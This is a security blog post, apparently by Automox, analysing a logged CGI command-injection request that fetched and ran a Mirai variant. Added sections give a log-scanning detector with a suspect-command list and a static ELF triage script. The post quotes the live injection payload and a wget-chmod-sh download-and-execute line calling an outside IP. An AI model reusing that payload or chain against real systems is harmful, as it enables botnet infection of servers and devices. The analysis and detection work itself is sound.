If you have run a web server of any kind, then you have likely seen some odd log entries. Those entries could be attributed to a crawler, typo or an attack. This week at Automox, we saw a very interesting entry in our logs. This entry was so intriguing that it immediately grabbed the attention of our Director of Infrastructure, CTO, and CISO. After some excited conversations back and forth via Slack, we got the payload and we determined it was…
The Attack
In our web server logs we saw the attacker chaining several shell commands into a single request, trying to exploit a command-injection weakness in a CGI login page that would let anyone run arbitrary commands on the web server.
/login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1"
Worth noting here is that we do not run mod_cgi anywhere in our infrastructure. This means the attack could never have worked against us, and the request would only have returned a 404 to the attacker. The attacker was trying to wget a payload, make it executable, and run it. Obviously, you do not want to download that payload onto your own host. So, the first step was to spin up a VM and get down to business.
By looking at the URL below, you’ll see that it downloads a file, chmods it, and runs it:
wget http://80.211.67.245/k -O /tmp/ks
Using wget in our VM, we downloaded the file:
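The log entry above is a good test case for a detection rule, so here is an added example (not part of the original post, and not Automox's code) that scans Apache/nginx combined-format access logs for exactly this pattern: a query parameter that, once percent-decoded, contains several shell commands chained with `;`, `|` or `&&`. The sample log lines are constructed for the example; the first one reproduces the request from the post, the others are benign traffic that must not be flagged. It also pulls out the download URL and the HTTP status, since a 404 (as in this case) tells you the request hit nothing exploitable.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines. The first reproduces the request seen in the post;
# the others are benign requests that a useful rule must not flag.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jun/2018:12:00:01 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 404 209 "-" "-"
203.0.113.11 - - [01/Jun/2018:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.12 - - [01/Jun/2018:12:00:03 +0000] "GET /search?q=wget%20manual HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# The quoted request part of a combined log line, and the status code after it.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"')
STATUS_RE = re.compile(r'" (?P<status>\d{3}) ')

# Commands that a download-and-execute chain almost always contains.
SUSPECT_COMMANDS = {"wget", "curl", "tftp", "ftpget", "chmod", "sh", "bash", "busybox"}

# Shell separators used to chain commands; splitting on them yields candidate commands.
SEPARATOR_RE = re.compile(r"[;|\n]|&&|\|\|")
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def decoded_params(target):
    """Return (name, value) pairs from the query string, percent-decoded repeatedly
    so that double-encoded payloads are unwrapped as well. The query is split on '&'
    only, because ';' is exactly the character the attacker uses to chain commands."""
    pairs = []
    for field in urlsplit(target).query.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        prev = None
        while value != prev:  # decode until the string stops changing
            prev, value = value, unquote_plus(value)
        pairs.append((name, value))
    return pairs


def command_chain(value):
    """Split a decoded parameter value on shell separators and return the segments
    whose first word is a known download/execute command (also catches /bin/sh)."""
    found = []
    for segment in SEPARATOR_RE.split(value):
        segment = segment.strip(" \t'\"`$()")  # drop quote-escape residue like the trailing '$
        if not segment:
            continue
        first = segment.split()[0].rsplit("/", 1)[-1]
        if first in SUSPECT_COMMANDS:
            found.append(segment)
    return found


def scan_line(line):
    """Return a finding for a log line carrying a chained command injection, else None.
    A single suspect word could be prose (a search for 'wget manual'); two or more
    chained commands in one parameter is treated as a payload."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = m.group("target")
    status = STATUS_RE.search(line)
    for name, value in decoded_params(target):
        chain = command_chain(value)
        if len(chain) >= 2:
            return {
                "client": line.split()[0],
                "path": urlsplit(target).path,
                "param": name,
                "commands": chain,
                "download_urls": URL_RE.findall(value),  # IoCs to block at the egress
                "status": status.group("status") if status else None,
            }
    return None


def scan_log(text):
    """Scan a whole log file's text and return the list of findings."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Splitting the query on `&` by hand rather than with `urllib.parse.parse_qsl` is deliberate: older Python versions also split on `;`, which would scatter the injected chain across several parameters and hide it from the rule.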
The Payload: Part 1
The first part of the payload is a shell script. The script contacts the server again and downloads a separate binary for each architecture the victim might be running on:
Well, well...this is just sloppy coding! Why not run `uname -m` and do a wget http://badsite/`uname -m`?
Using wget we get the payload.
The Payload: Part 2
Now that the file is on the server, the script executes it and launches the malware. Obviously, we did not want to run that. So, what was the attack? To find out, we hashed the file and submitted the hash to VirusTotal:
The results told us that it was Mirai:
Interestingly enough, in the twenty hours that passed between when I first saw the log entry and when I did this write-up, it has been detected 7 more times. Therefore, it must be a new variant:
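The two payload stages above call for static triage: the per-architecture binaries from Part 1 can be classified from their ELF headers without ever running them, and the hash from Part 2 is what gets submitted to VirusTotal. The following is an added example (not the post's or Automox's code) that does both; the sample files are constructed stand-ins with minimal ELF headers, not real malware, and the file names are made up.

```python
import hashlib
import struct

# e_machine values from the ELF specification for architectures that IoT
# botnets such as Mirai commonly ship binaries for, plus the usual desktop ones.
ELF_MACHINES = {
    0x02: "sparc", 0x03: "x86", 0x04: "m68k", 0x08: "mips", 0x14: "powerpc",
    0x28: "arm", 0x2A: "superh", 0x3E: "x86-64", 0xB7: "aarch64",
}
ELF_TYPES = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}


def sha256_hex(data: bytes) -> str:
    """SHA-256 of the sample; this is the value to look up on VirusTotal."""
    return hashlib.sha256(data).hexdigest()


def elf_info(data: bytes):
    """Parse the fixed part of an ELF header and report class, endianness, type
    and target machine, or None when the blob is not an ELF file. Only the first
    20 bytes are read and nothing is executed."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]   # EI_CLASS (1=32-bit, 2=64-bit), EI_DATA (1=LE, 2=BE)
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": ELF_TYPES.get(e_type, f"unknown({e_type})"),
        "machine": ELF_MACHINES.get(e_machine, f"unknown(0x{e_machine:x})"),
    }


def triage(samples):
    """One summary row per downloaded file: name, hash to submit, and what the header says it is."""
    return [{"name": name, "sha256": sha256_hex(data), "elf": elf_info(data)}
            for name, data in samples.items()]


def fake_elf(ei_class, ei_data, e_type, e_machine) -> bytes:
    """Build a minimal 64-byte ELF header for the constructed sample data (not a real binary)."""
    endian = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    return ident + struct.pack(endian + "HH", e_type, e_machine) + b"\x00" * 44


# Constructed stand-ins for the per-architecture files a dropper script fetches.
SAMPLES = {
    "sample.mips": fake_elf(1, 2, 2, 0x08),  # 32-bit big-endian MIPS
    "sample.arm": fake_elf(1, 1, 2, 0x28),   # 32-bit little-endian ARM
    "sample.x86": fake_elf(1, 1, 2, 0x03),   # 32-bit x86
    "dropper.sh": b"#!/bin/sh\n# stage-1 script placeholder, not an ELF\n",
}

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(row)
```

Running the header parser before anything else tells you which of the downloaded files could even execute on the box you are analysing, and the hash lets you check VirusTotal without uploading the sample itself.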
Conclusion
This was a Mirai attack. This type of attack would only work on devices with a web application using CGI, and it would allow commands to be run by an unauthenticated user. Mirai has been out for nearly two years now and we are still seeing new variants being released. This just reinforces the need to be vigilant about overall security hygiene. Certainly do not run your web application as root, make sure to patch your OS, and frequently change passwords to protect your infrastructure. As in the case of Mirai, do not expose your configuration web page to the public internet.
Automox for Easy IT Operations
Automox is the cloud-native IT operations platform for modern organizations. It makes it easy to keep every endpoint automatically configured, patched, and secured – anywhere in the world. With the push of a button, IT admins can fix critical vulnerabilities faster, slash cost and complexity, and win back hours in their day.
Grab your free trial of Automox and join thousands of companies transforming IT operations into a strategic business driver.